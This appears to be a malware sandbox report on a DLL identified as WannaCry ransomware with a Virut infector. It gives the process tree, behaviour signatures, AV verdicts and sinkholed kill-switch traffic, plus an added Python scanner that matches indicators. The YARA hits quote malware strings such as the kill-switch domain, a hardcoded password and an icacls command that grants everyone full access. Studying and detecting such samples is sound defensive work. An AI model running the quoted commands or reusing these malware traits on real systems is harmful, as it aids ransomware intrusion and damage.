
Windows Analysis Report
y2jb4FtSNq

Overview

General Information

Sample Name: y2jb4FtSNq (renamed file extension from none to dll)
Analysis ID: 672008
MD5: 61d81fc3058ef67dd352bc2fd80bce2d
SHA1: bc7c0991e7e4646f8b2c9297a83a4259801e85bf
SHA256: 66b760a1f256e538002892e020f0993d6e701dc15bb7333109b3a59b5b157082
Tags: dll, OpenCTIBRSandboxed

Detection

Wannacry, Virut
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Both labels apply to this sample. The WannaCry YARA rules match the submitted DLL and the dropped tasksche.exe, while the dropped mssecsvc.exe is additionally labelled W32/Virut.Gen and the Virut YARA rule matches memory dumps of numerous system processes. The thread injection into system processes and the burst of NXDOMAIN lookups for random six-letter .com names listed under Networking are consistent with that second, file-infector component; WannaCry itself only contacts the single kill-switch domain.

Signatures

Multi AV Scanner detection for submitted file
Detected Wannacry Ransomware
Malicious sample detected (through community Yara rule)
Yara detected Wannacry ransomware
Yara detected Virut
Antivirus / Scanner detection for submitted sample
Tries to download HTTP data from a sinkholed server
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
PE file has a writeable .text section
Changes memory attributes in foreign processes to executable or writable
Tries to evade debugger and weak emulator (self modifying code)
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
Machine Learning detection for dropped file
Creates a thread in another existing process (thread injection)
Tries to resolve many domain names, but no domain seems valid
Drops executables to the windows directory (C:\Windows) and starts them
Queries random domain names (often used to prevent blacklisting and sinkholes)
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
AV process strings found (often used to terminate AV products)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6236 cmdline: loaddll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6244 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6264 cmdline: rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • mssecsvc.exe (PID: 6360 cmdline: C:\WINDOWS\mssecsvc.exe MD5: B0F06045E4D3E693094C54C315A5B632)
          • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F9017F2DC455AD373DF036F5817A8870)
          • lsass.exe (PID: 600 cmdline: C:\Windows\system32\lsass.exe MD5: 317340CD278A374BCEF6A30194557227)
          • fontdrvhost.exe (PID: 684 cmdline: fontdrvhost.exe MD5: 31113981180E69C2773BCADA4051738A)
          • svchost.exe (PID: 704 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 756 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
            • backgroundTaskHost.exe (PID: 5704 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca MD5: B7FC4A29431D4F795BBAB1FB182B759A)
          • svchost.exe (PID: 804 cmdline: c:\windows\system32\svchost.exe -k rpcss -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 856 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • fontdrvhost.exe (PID: 900 cmdline: fontdrvhost.exe MD5: 31113981180E69C2773BCADA4051738A)
          • dwm.exe (PID: 964 cmdline: dwm.exe MD5: 70073A05B2B43FFB7A625708BB29E7C7)
          • svchost.exe (PID: 280 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 328 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 384 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s lmhosts MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 848 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1080 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1092 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s TimeBrokerSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1156 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1264 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s EventLog MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1312 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s EventSystem MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • rundll32.exe (PID: 6252 cmdline: rundll32.exe C:\Users\user\Desktop\y2jb4FtSNq.dll,PlayGame MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6464 cmdline: rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",PlayGame MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • mssecsvc.exe (PID: 6500 cmdline: C:\WINDOWS\mssecsvc.exe MD5: B0F06045E4D3E693094C54C315A5B632)
        • tasksche.exe (PID: 3780 cmdline: C:\WINDOWS\tasksche.exe /i MD5: 3233ACED9279EF54267C479BBA665B90)
  • mssecsvc.exe (PID: 6636 cmdline: C:\WINDOWS\mssecsvc.exe -m security MD5: B0F06045E4D3E693094C54C315A5B632)
  • svchost.exe (PID: 6740 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6776 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6804 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6896 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6960 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 7008 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 7032 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3324 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5896 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5660 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
y2jb4FtSNq.dll | WannaCry_Ransomware | Detects WannaCry Ransomware | Florian Roth (with the help of binar.ly)
  • 0x45604:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0x353d0:$x3: tasksche.exe
  • 0x455e0:$x3: tasksche.exe
  • 0x455bc:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0x45634:$x5: WNcry@2ol7
  • 0x3543b:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
  • 0x3028:$x7: mssecsvc.exe
  • 0x120ac:$x7: mssecsvc.exe
  • 0x1b3b4:$x7: mssecsvc.exe
  • 0x353a8:$x8: C:\%s\qeriuwjhrf
  • 0x45604:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0x3014:$s1: C:\%s\%s
  • 0x12098:$s1: C:\%s\%s
  • 0x1b39c:$s1: C:\%s\%s
  • 0x353bc:$s1: C:\%s\%s
  • 0x45534:$s3: cmd.exe /c "%s"
  • 0x77a88:$s4: msg/m_portuguese.wnry
  • 0x326f0:$s5: \\192.168.56.20\IPC$
  • 0x1fae5:$s6: \\172.16.99.5\IPC$
  • 0xd195:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
  • 0x78da:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
y2jb4FtSNq.dll | JoeSecurity_Wannacry | Yara detected Wannacry ransomware | Joe Security
y2jb4FtSNq.dll | wanna_cry_ransomware_generic | detects wannacry ransomware on disk and in virtual page | us-cert code analysis team
  • 0x455e0:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
  • 0x45608:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Source | Rule | Description | Author | Strings
C:\Windows\tasksche.exe | WannaCry_Ransomware | Detects WannaCry Ransomware | Florian Roth (with the help of binar.ly)
  • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0xf4d8:$x3: tasksche.exe
  • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0xf52c:$x5: WNcry@2ol7
  • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0xf42c:$s3: cmd.exe /c "%s"
  • 0x41980:$s4: msg/m_portuguese.wnry
  • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
  • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
  • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
C:\Windows\tasksche.exe | wanna_cry_ransomware_generic | detects wannacry ransomware on disk and in virtual page | us-cert code analysis team
  • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
  • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
C:\Windows\tasksche.exe | Win32_Ransomware_WannaCry | unknown | ReversingLabs
  • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
  • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
C:\Windows\mssecsvc.exe | WannaCry_Ransomware | Detects WannaCry Ransomware | Florian Roth (with the help of binar.ly)
  • 0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0x3136c:$x3: tasksche.exe
  • 0x4157c:$x3: tasksche.exe
  • 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0x415d0:$x5: WNcry@2ol7
  • 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
  • 0xe048:$x7: mssecsvc.exe
  • 0x17350:$x7: mssecsvc.exe
  • 0x31344:$x8: C:\%s\qeriuwjhrf
  • 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0xe034:$s1: C:\%s\%s
  • 0x17338:$s1: C:\%s\%s
  • 0x31358:$s1: C:\%s\%s
  • 0x414d0:$s3: cmd.exe /c "%s"
  • 0x73a24:$s4: msg/m_portuguese.wnry
  • 0x2e68c:$s5: \\192.168.56.20\IPC$
  • 0x1ba81:$s6: \\172.16.99.5\IPC$
  • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
  • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
  • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
  • 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
C:\Windows\mssecsvc.exe | WannaCry_Ransomware_Gen | Detects WannaCry Ransomware | Florian Roth (based on rule by US CERT)
  • 0x1bacc:$s1: __TREEID__PLACEHOLDER__
  • 0x1bb68:$s1: __TREEID__PLACEHOLDER__
  • 0x1c3d4:$s1: __TREEID__PLACEHOLDER__
  • 0x1d439:$s1: __TREEID__PLACEHOLDER__
  • 0x1e4a0:$s1: __TREEID__PLACEHOLDER__
  • 0x1f508:$s1: __TREEID__PLACEHOLDER__
  • 0x20570:$s1: __TREEID__PLACEHOLDER__
  • 0x215d8:$s1: __TREEID__PLACEHOLDER__
  • 0x22640:$s1: __TREEID__PLACEHOLDER__
  • 0x236a8:$s1: __TREEID__PLACEHOLDER__
  • 0x24710:$s1: __TREEID__PLACEHOLDER__
  • 0x25778:$s1: __TREEID__PLACEHOLDER__
  • 0x267e0:$s1: __TREEID__PLACEHOLDER__
  • 0x27848:$s1: __TREEID__PLACEHOLDER__
  • 0x288b0:$s1: __TREEID__PLACEHOLDER__
  • 0x29918:$s1: __TREEID__PLACEHOLDER__
  • 0x2a980:$s1: __TREEID__PLACEHOLDER__
  • 0x2ab94:$s1: __TREEID__PLACEHOLDER__
  • 0x2abf4:$s1: __TREEID__PLACEHOLDER__
  • 0x2e2c4:$s1: __TREEID__PLACEHOLDER__
  • 0x2e340:$s1: __TREEID__PLACEHOLDER__
(3 further entries not shown)
Source | Rule | Description | Author | Strings
00000022.00000002.780744908.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_Virut | Yara detected Virut | Joe Security
00000021.00000000.354298451.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_Virut | Yara detected Virut | Joe Security
0000000E.00000000.283723923.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Virut | Yara detected Virut | Joe Security
00000016.00000000.300112892.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_Virut | Yara detected Virut | Joe Security
00000011.00000000.293535690.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_Virut | Yara detected Virut | Joe Security
(112 further entries not shown)
Source | Rule | Description | Author | Strings
8.0.mssecsvc.exe.7100a4.3.unpack | WannaCry_Ransomware | Detects WannaCry Ransomware | Florian Roth (with the help of binar.ly)
  • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0xf4d8:$x3: tasksche.exe
  • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0xf52c:$x5: WNcry@2ol7
  • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0xf42c:$s3: cmd.exe /c "%s"
  • 0x41980:$s4: msg/m_portuguese.wnry
  • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
  • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
  • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
8.0.mssecsvc.exe.7100a4.3.unpack | wanna_cry_ransomware_generic | detects wannacry ransomware on disk and in virtual page | us-cert code analysis team
  • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
  • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
8.0.mssecsvc.exe.7100a4.3.unpack | Win32_Ransomware_WannaCry | unknown | ReversingLabs
  • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
  • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
31.2.tasksche.exe.400000.0.unpack | WannaCry_Ransomware | Detects WannaCry Ransomware | Florian Roth (with the help of binar.ly)
  • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0xf4d8:$x3: tasksche.exe
  • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0xf52c:$x5: WNcry@2ol7
  • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0xf42c:$s3: cmd.exe /c "%s"
  • 0x41980:$s4: msg/m_portuguese.wnry
  • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
  • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
  • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
31.2.tasksche.exe.400000.0.unpack | wanna_cry_ransomware_generic | detects wannacry ransomware on disk and in virtual page | us-cert code analysis team
  • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
  • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
(135 further entries not shown)
              No Sigma rule has matched
              No Snort rule has matched
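The YARA tables above list each matched string as "offset:$name: value". The following scanner, added here as an illustration and not taken from the report or from Joe Sandbox, reproduces that output form for the text and hex patterns quoted in the WannaCry_Ransomware hits, so a practitioner can compare offsets from a file of their own against the table. The input buffer is constructed inside the block and is not the analysed file; the verdict condition is a simplification assumed for this example, not the published rule's exact condition.

```python
"""Minimal YARA-style string/hex scanner that reports hits as 'offset:$name: value'.

Added example; the indicator strings come from the rule hits on this page, the
test buffer is constructed below, and the verdict condition is a simplification.
"""
from typing import Dict, List

# Text strings quoted in the WannaCry_Ransomware hits (YARA identifiers kept).
TEXT_PATTERNS: Dict[str, bytes] = {
    "$x1": b"icacls . /grant Everyone:F /T /C /Q",
    "$x3": b"tasksche.exe",
    "$x4": b"Global\\MsWinZonesCacheCounterMutexA",
    "$x5": b"WNcry@2ol7",
    "$x6": b"www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com",
    "$x7": b"mssecsvc.exe",
    "$x8": b"C:\\%s\\qeriuwjhrf",
    "$s1": b"C:\\%s\\%s",
    "$s3": b'cmd.exe /c "%s"',
    "$s4": b"msg/m_portuguese.wnry",
}
# Opcode patterns from the same hits, in YARA hex-string notation (no wildcards).
HEX_PATTERNS: Dict[str, str] = {
    "$op1": "10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00",
    "$op2": "44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44",
}


def hex_pattern_to_bytes(pattern: str) -> bytes:
    """Turn a space-separated hex string such as '10 AC' into raw bytes."""
    return bytes.fromhex(pattern.replace(" ", ""))


def find_all(buf: bytes, needle: bytes) -> List[int]:
    """Every offset of needle in buf, ascending; overlapping hits are included."""
    hits: List[int] = []
    start = 0
    while (idx := buf.find(needle, start)) != -1:
        hits.append(idx)
        start = idx + 1
    return hits


def scan(buf: bytes) -> Dict[str, List[int]]:
    """Map each pattern name to its hit offsets; patterns with no hit are omitted."""
    patterns: Dict[str, bytes] = dict(TEXT_PATTERNS)
    patterns.update({k: hex_pattern_to_bytes(v) for k, v in HEX_PATTERNS.items()})
    result: Dict[str, List[int]] = {}
    for name, needle in patterns.items():
        offsets = find_all(buf, needle)
        if offsets:
            result[name] = offsets
    return result


def verdict(buf: bytes, hits: Dict[str, List[int]]) -> bool:
    """Simplified condition (an assumption for this example, not the published
    rule's condition): MZ header, then either one $x and one $s string, or both
    $op patterns."""
    if buf[:2] != b"MZ":
        return False
    have_x = any(name.startswith("$x") for name in hits)
    have_s = any(name.startswith("$s") for name in hits)
    have_ops = sum(1 for name in hits if name.startswith("$op")) >= 2
    return (have_x and have_s) or have_ops


def format_hits(hits: Dict[str, List[int]]) -> List[str]:
    """Render hits in the report's form, e.g. '0x100:$x7: mssecsvc.exe', by offset."""
    shown: Dict[str, bytes] = dict(TEXT_PATTERNS)
    shown.update({k: v.encode() for k, v in HEX_PATTERNS.items()})
    lines = [f"{off:#x}:{name}: {shown[name].decode()}"
             for name, offsets in hits.items() for off in offsets]
    return sorted(lines, key=lambda s: int(s.split(":")[0], 16))


def build_sample() -> bytes:
    """Constructed 8 KiB buffer: MZ header plus a few indicators at known offsets.
    It stands in for a file read from disk and is NOT the analysed sample."""
    buf = bytearray(0x2000)
    buf[0:2] = b"MZ"
    placements = [
        (0x100, TEXT_PATTERNS["$x7"]),  # mssecsvc.exe twice, like the repeated $x7 hits
        (0x200, TEXT_PATTERNS["$x7"]),
        (0x300, TEXT_PATTERNS["$x6"]),  # kill-switch domain
        (0x400, TEXT_PATTERNS["$s3"]),
        (0x500, hex_pattern_to_bytes(HEX_PATTERNS["$op1"])),
    ]
    for off, data in placements:
        buf[off:off + len(data)] = data
    return bytes(buf)


if __name__ == "__main__":
    sample = build_sample()
    found = scan(sample)
    for line in format_hits(found):
        print(line)
    print("WannaCry indicators:", "MATCH" if verdict(sample, found) else "no match")
```

To run it against a real file, replace build_sample() with the file's bytes; hex patterns with wildcards (?? in YARA) are not handled here, which is one reason the real rules are better run through yara itself.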

              AV Detection

Source: y2jb4FtSNq.dll | Virustotal: Detection: 84%
Source: y2jb4FtSNq.dll | Metadefender: Detection: 77%
Source: y2jb4FtSNq.dll | ReversingLabs: Detection: 92%
Source: y2jb4FtSNq.dll | Avira: detected
Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ | URL Reputation: Label: malware
Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | URL Reputation: Label: malware
Source: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | Virustotal: Detection: 12%
Source: C:\Windows\tasksche.exe | Avira: detection malicious, Label: TR/FileCoder.AU
Source: C:\Windows\mssecsvc.exe | Avira: detection malicious, Label: W32/Virut.Gen
Source: C:\Windows\mssecsvc.exe | Metadefender: Detection: 82%
Source: C:\Windows\mssecsvc.exe | ReversingLabs: Detection: 96%
Source: C:\Windows\tasksche.exe | Metadefender: Detection: 85%
Source: C:\Windows\tasksche.exe | ReversingLabs: Detection: 95%
Source: y2jb4FtSNq.dll | Joe Sandbox ML: detected
Source: C:\Windows\tasksche.exe | Joe Sandbox ML: detected
Source: C:\Windows\mssecsvc.exe | Joe Sandbox ML: detected
Source: 4.0.mssecsvc.exe.400000.6.unpack | Avira: Label: W32/Virut.Gen
Source: 12.2.mssecsvc.exe.400000.0.unpack | Avira: Label: W32/Virut.Gen
Source: 12.2.mssecsvc.exe.7100a4.1.unpack | Avira: Label: TR/FileCoder.AU
Source: 4.2.mssecsvc.exe.7100a4.1.unpack | Avira: Label: TR/FileCoder.AU
Source: 4.2.mssecsvc.exe.400000.0.unpack | Avira: Label: TR/FileCoder.AU
Source: 4.0.mssecsvc.exe.400000.0.unpack | Avira: Label: W32/Virut.Gen
Source: 4.0.mssecsvc.exe.400000.2.unpack | Avira: Label: W32/Virut.Gen
Source: 8.0.mssecsvc.exe.7100a4.1.unpack | Avira: Label: TR/FileCoder.AU
Source: 4.0.mssecsvc.exe.400000.4.unpack | Avira: Label: W32/Virut.Gen
Source: 31.2.tasksche.exe.400000.0.unpack | Avira: Label: TR/FileCoder.AU
Source: 8.2.mssecsvc.exe.7100a4.1.unpack | Avira: Label: TR/FileCoder.AU
Source: 31.0.tasksche.exe.400000.0.unpack | Avira: Label: TR/FileCoder.AU
Source: 4.0.mssecsvc.exe.7100a4.5.unpack | Avira: Label: TR/FileCoder.AU
Source: 8.0.mssecsvc.exe.400000.2.unpack | Avira: Label: W32/Virut.Gen
Source: 8.2.mssecsvc.exe.400000.0.unpack | Avira: Label: TR/FileCoder.AU
Source: 4.0.mssecsvc.exe.7100a4.7.unpack | Avira: Label: TR/FileCoder.AU
Source: 4.0.mssecsvc.exe.7100a4.1.unpack | Avira: Label: TR/FileCoder.AU
Source: 8.0.mssecsvc.exe.7100a4.3.unpack | Avira: Label: TR/FileCoder.AU
Source: 8.0.mssecsvc.exe.7100a4.7.unpack | Avira: Label: TR/FileCoder.AU
Source: 12.0.mssecsvc.exe.400000.0.unpack | Avira: Label: W32/Virut.Gen
Source: 12.0.mssecsvc.exe.7100a4.1.unpack | Avira: Label: TR/FileCoder.AU
Source: 8.0.mssecsvc.exe.7100a4.5.unpack | Avira: Label: TR/FileCoder.AU
Source: 8.0.mssecsvc.exe.400000.4.unpack | Avira: Label: W32/Virut.Gen
Source: 8.0.mssecsvc.exe.400000.0.unpack | Avira: Label: W32/Virut.Gen
Source: 4.0.mssecsvc.exe.7100a4.3.unpack | Avira: Label: TR/FileCoder.AU
Source: 8.0.mssecsvc.exe.400000.6.unpack | Avira: Label: W32/Virut.Gen
Source: C:\Windows\tasksche.exe | Code function: 31_2_004018B9 CryptReleaseContext, 31_2_004018B9
Source: y2jb4FtSNq.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
Source: C:\Windows\System32\backgroundTaskHost.exe | File opened: C:\Windows\System32\TileDataRepository.dll
Source: C:\Windows\System32\backgroundTaskHost.exe | File opened: C:\Windows\system32\Windows.StateRepository.dll
Source: C:\Windows\System32\backgroundTaskHost.exe | File opened: C:\Windows\System32\ContentDeliveryManager.Utilities.dll
Source: C:\Windows\System32\backgroundTaskHost.exe | File opened: C:\Windows\SYSTEM32\usermgrcli.dll
Source: C:\Windows\System32\backgroundTaskHost.exe | File opened: C:\Windows\system32\StateRepository.Core.dll
Source: C:\Windows\System32\backgroundTaskHost.exe | File opened: C:\Windows\System32\usermgrproxy.dll

              Networking

Source: global traffic | HTTP traffic detected:
HTTP/1.1 200 OK
Date: Fri, 22 Jul 2022 23:44:23 GMT
Content-Type: text/html
Content-Length: 607
Connection: close
Server: cloudflare
CF-RAY: 72f00b44eb909134-FRA

<!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>

Source: global traffic | HTTP traffic detected:
HTTP/1.1 200 OK
Date: Fri, 22 Jul 2022 23:46:05 GMT
Content-Type: text/html
Content-Length: 607
Connection: close
Server: cloudflare
CF-RAY: 72f00dc0dd689165-FRA

